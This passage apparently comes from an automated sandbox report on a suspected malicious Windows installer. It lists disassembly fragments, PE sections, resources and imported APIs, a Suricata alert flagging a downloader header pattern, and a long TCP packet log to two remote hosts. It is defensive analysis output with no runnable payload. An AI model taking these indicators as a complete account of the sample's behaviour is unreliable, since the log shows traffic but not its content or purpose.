                                                mov dword ptr [0042F424h], eax
                                                call 00007F123C600B67h
                                                cmp eax, ebx
                                                je 00007F123C5FDA41h
                                                push 0000001Eh
                                                call eax
                                                test eax, eax
                                                je 00007F123C5FDA39h
                                                or byte ptr [0042F42Fh], 00000040h
                                                push ebp
                                                call dword ptr [00408038h]
                                                push ebx
                                                call dword ptr [00408288h]
                                                mov dword ptr [0042F4F8h], eax
                                                push ebx
                                                lea eax, dword ptr [esp+38h]
                                                push 00000160h
                                                push eax
                                                push ebx
                                                push 00429850h
                                                call dword ptr [0040816Ch]
                                                push 0040A188h

                                                Rich Headers

                                                Programming Language:
                                                • [EXP] VC++ 6.0 SP5 build 8804

                                                Data Directories

                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x85440xa0.rdata
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x580000x41dd0.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0xd8aa80x13f8
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x80000x29c.rdata
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                Sections

                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                .text0x10000x64570x6600f6e38befa56abea7a550141c731da779False0.6682368259803921data6.434985703212657IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                .rdata0x80000x13800x1400569269e9338b2e8ce268ead1326e2b0bFalse0.4625data5.2610038973135005IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .data0xa0000x255380x60017edd496e40111b5a48947c480fda13cFalse0.4635416666666667data4.133728555004788IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .ndata0x300000x280000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .rsrc0x580000x41dd00x41e0051f103b856396aac282c5bd5a24beff1False0.6063619248102466data5.8960782160116745IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                Resources

                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                RT_ICON0x583b80x130caPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.998410786148207
                                                RT_ICON0x6b4880x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.40775464332189754
                                                RT_ICON0x7bcb00x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States0.4554866512507883
                                                RT_ICON0x851580x67e8Device independent bitmap graphic, 80 x 160 x 32, image size 26560EnglishUnited States0.462218045112782
                                                RT_ICON0x8b9400x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States0.4729667282809612
                                                RT_ICON0x90dc80x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.46835144071799717
                                                RT_ICON0x94ff00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.5149377593360995
                                                RT_ICON0x975980x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.5457317073170732
                                                RT_ICON0x986400x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.6073770491803279
                                                RT_ICON0x98fc80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.6719858156028369
                                                RT_DIALOG0x994300x100dataEnglishUnited States0.5234375
                                                RT_DIALOG0x995300x11cdataEnglishUnited States0.6056338028169014
                                                RT_DIALOG0x996500xc4dataEnglishUnited States0.5918367346938775
                                                RT_DIALOG0x997180x60dataEnglishUnited States0.7291666666666666
                                                RT_GROUP_ICON0x997780x92Targa image data - Map 32 x 12490 x 1 +1EnglishUnited States0.7191780821917808
                                                RT_VERSION0x998100x27cdataEnglishUnited States0.5
                                                RT_MANIFEST0x99a900x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795

                                                Imports

                                                DLLImport
                                                ADVAPI32.dllRegCreateKeyExA, RegEnumKeyA, RegQueryValueExA, RegSetValueExA, RegCloseKey, RegDeleteValueA, RegDeleteKeyA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, SetFileSecurityA, RegOpenKeyExA, RegEnumValueA
                                                SHELL32.dllSHGetFileInfoA, SHFileOperationA, SHGetPathFromIDListA, ShellExecuteExA, SHGetSpecialFolderLocation, SHBrowseForFolderA
                                                ole32.dllIIDFromString, OleInitialize, OleUninitialize, CoCreateInstance, CoTaskMemFree
                                                COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                                USER32.dllSetClipboardData, CharPrevA, CallWindowProcA, PeekMessageA, DispatchMessageA, MessageBoxIndirectA, GetDlgItemTextA, SetDlgItemTextA, GetSystemMetrics, CreatePopupMenu, AppendMenuA, TrackPopupMenu, FillRect, EmptyClipboard, LoadCursorA, GetMessagePos, CheckDlgButton, GetSysColor, SetCursor, GetWindowLongA, SetClassLongA, SetWindowPos, IsWindowEnabled, GetWindowRect, GetSystemMenu, EnableMenuItem, RegisterClassA, ScreenToClient, EndDialog, GetClassInfoA, SystemParametersInfoA, CreateWindowExA, ExitWindowsEx, DialogBoxParamA, CharNextA, SetTimer, DestroyWindow, CreateDialogParamA, SetForegroundWindow, SetWindowTextA, PostQuitMessage, SendMessageTimeoutA, ShowWindow, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, GetDC, SetWindowLongA, LoadImageA, InvalidateRect, ReleaseDC, EnableWindow, BeginPaint, SendMessageA, DefWindowProcA, DrawTextA, GetClientRect, EndPaint, IsWindowVisible, CloseClipboard, OpenClipboard
                                                GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                                KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetProcAddress, GetSystemDirectoryA, WideCharToMultiByte, MoveFileExA, ReadFile, GetTempFileNameA, WriteFile, RemoveDirectoryA, CreateProcessA, CreateFileA, GetLastError, CreateThread, CreateDirectoryA, GlobalUnlock, GetDiskFreeSpaceA, GlobalLock, SetErrorMode, GetVersion, lstrcpynA, GetCommandLineA, GetTempPathA, lstrlenA, SetEnvironmentVariableA, ExitProcess, GetWindowsDirectoryA, GetCurrentProcess, GetModuleFileNameA, CopyFileA, GetTickCount, Sleep, GetFileSize, GetFileAttributesA, SetCurrentDirectoryA, SetFileAttributesA, GetFullPathNameA, GetShortPathNameA, MoveFileA, CompareFileTime, SetFileTime, SearchPathA, lstrcmpiA, lstrcmpA, CloseHandle, GlobalFree, GlobalAlloc, ExpandEnvironmentStringsA, LoadLibraryExA, FreeLibrary, lstrcpyA, lstrcatA, FindClose, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, SetFilePointer, GetModuleHandleA, FindNextFileA, FindFirstFileA, DeleteFileA, MulDiv

                                                Possible Origin

                                                Language of compilation systemCountry where language is spokenMap
                                                EnglishUnited States

                                                Network Behavior

                                                Suricata IDS Alerts

                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                2024-11-08T14:23:31.460462+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.11.2049762142.250.72.110443TCP

                                                Network Port Distribution

                                                TCP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Nov 8, 2024 14:23:30.988672972 CET49762443192.168.11.20142.250.72.110
                                                Nov 8, 2024 14:23:30.988765955 CET44349762142.250.72.110192.168.11.20
                                                Nov 8, 2024 14:23:30.988955975 CET49762443192.168.11.20142.250.72.110
                                                Nov 8, 2024 14:23:31.003061056 CET49762443192.168.11.20142.250.72.110
                                                Nov 8, 2024 14:23:31.003087997 CET44349762142.250.72.110192.168.11.20
                                                Nov 8, 2024 14:23:31.231067896 CET44349762142.250.72.110192.168.11.20
                                                Nov 8, 2024 14:23:31.231354952 CET49762443192.168.11.20142.250.72.110
                                                Nov 8, 2024 14:23:31.232614994 CET44349762142.250.72.110192.168.11.20
                                                Nov 8, 2024 14:23:31.232830048 CET49762443192.168.11.20142.250.72.110
                                                Nov 8, 2024 14:23:31.268759012 CET49762443192.168.11.20142.250.72.110
                                                Nov 8, 2024 14:23:31.268785000 CET44349762142.250.72.110192.168.11.20
                                                Nov 8, 2024 14:23:31.269185066 CET44349762142.250.72.110192.168.11.20
                                                Nov 8, 2024 14:23:31.269328117 CET49762443192.168.11.20142.250.72.110
                                                Nov 8, 2024 14:23:31.272093058 CET49762443192.168.11.20142.250.72.110
                                                Nov 8, 2024 14:23:31.316003084 CET44349762142.250.72.110192.168.11.20
                                                Nov 8, 2024 14:23:31.460484028 CET44349762142.250.72.110192.168.11.20
                                                Nov 8, 2024 14:23:31.460582972 CET44349762142.250.72.110192.168.11.20
                                                Nov 8, 2024 14:23:31.460643053 CET49762443192.168.11.20142.250.72.110
                                                Nov 8, 2024 14:23:31.460797071 CET49762443192.168.11.20142.250.72.110
                                                Nov 8, 2024 14:23:31.461708069 CET49762443192.168.11.20142.250.72.110
                                                Nov 8, 2024 14:23:31.461729050 CET44349762142.250.72.110192.168.11.20
                                                Nov 8, 2024 14:23:31.601119041 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:31.601139069 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:31.601998091 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:31.601999044 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:31.602020025 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:31.833661079 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:31.833898067 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:31.833930016 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:31.839099884 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:31.839128017 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:31.839668036 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:31.839853048 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:31.840106964 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:31.884048939 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.041508913 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.041696072 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.041743040 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.056086063 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.056291103 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.056291103 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.056291103 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.071223021 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.071494102 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.071547031 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.071836948 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.144100904 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.144321918 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.144366980 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.144584894 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.147651911 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.147849083 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.147898912 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.148138046 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.156277895 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.156701088 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.156758070 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.157073021 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.162622929 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.162893057 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.162944078 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.163213968 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.170684099 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.170972109 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.171021938 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.171425104 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.177612066 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.177866936 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.177912951 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.178160906 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.185030937 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.185394049 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.185446024 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.185761929 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.196263075 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.196497917 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.196548939 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.196795940 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.199584007 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.199848890 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.199898958 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.200154066 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.206619978 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.206882000 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.206933022 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.207206011 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.217787027 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.218019009 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.218069077 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.218296051 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.220798016 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.221051931 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.221102953 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.221358061 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.227920055 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.228125095 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.228178024 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.228467941 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.240751028 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.241044044 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.241097927 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.241338968 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.247010946 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.247342110 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.247394085 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.247665882 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.249811888 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.250108004 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.250159979 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.250410080 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.258261919 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.258497953 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.258549929 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.258841038 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.261485100 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.261734009 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.261786938 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.262015104 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.266053915 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.266294956 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.266346931 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.266563892 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.270962954 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.271167040 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.271174908 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.271223068 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.271403074 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.276802063 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.277029991 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.277081966 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.277318954 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.281096935 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.281317949 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.281337023 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.281573057 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.285475016 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.285661936 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.285679102 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.285883904 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.290333986 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.290517092 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.290539026 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.290723085 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.295388937 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.295653105 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.295670986 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.295928001 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.302630901 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.302867889 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.302886009 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.303185940 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.305270910 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.305494070 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.305510998 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.305696964 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.310107946 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.310389996 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.310406923 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.310610056 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.315072060 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.315332890 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.315350056 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.315563917 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.321193933 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.321451902 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.321469069 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.321697950 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.325607061 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.325877905 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.325896025 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.326149940 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.329885960 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.330123901 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.330141068 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.330409050 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.334698915 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.334971905 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.334990025 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.335242033 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.339577913 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.339832067 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.339848995 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.340034962 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.346559048 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.346827030 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.346843958 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.347136974 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.348205090 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.348478079 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.348495007 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.348743916 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.352823973 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.353087902 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.353105068 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.353344917 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.357008934 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.357204914 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.357227087 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.357453108 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.359658003 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.359934092 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.359951973 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.360146046 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.368644953 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.368710995 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.368778944 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.368879080 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.368901968 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.368915081 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.369055033 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.369075060 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.369910002 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.370162964 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.370182037 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.370471001 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.372535944 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.372802973 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.372823954 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.373085022 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.375072956 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.375345945 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.375364065 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.375618935 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.377535105 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.377813101 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.377831936 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.378144026 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.380239964 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.380495071 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.380513906 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.380742073 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.384236097 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.384501934 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.384521008 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.384780884 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.388506889 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.388571024 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.388725996 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.388746977 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.388757944 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.388953924 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.390295029 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.390635967 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.390675068 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.390906096 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.392458916 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.392719030 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.392738104 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.392976046 CET49763443192.168.11.20142.250.65.225
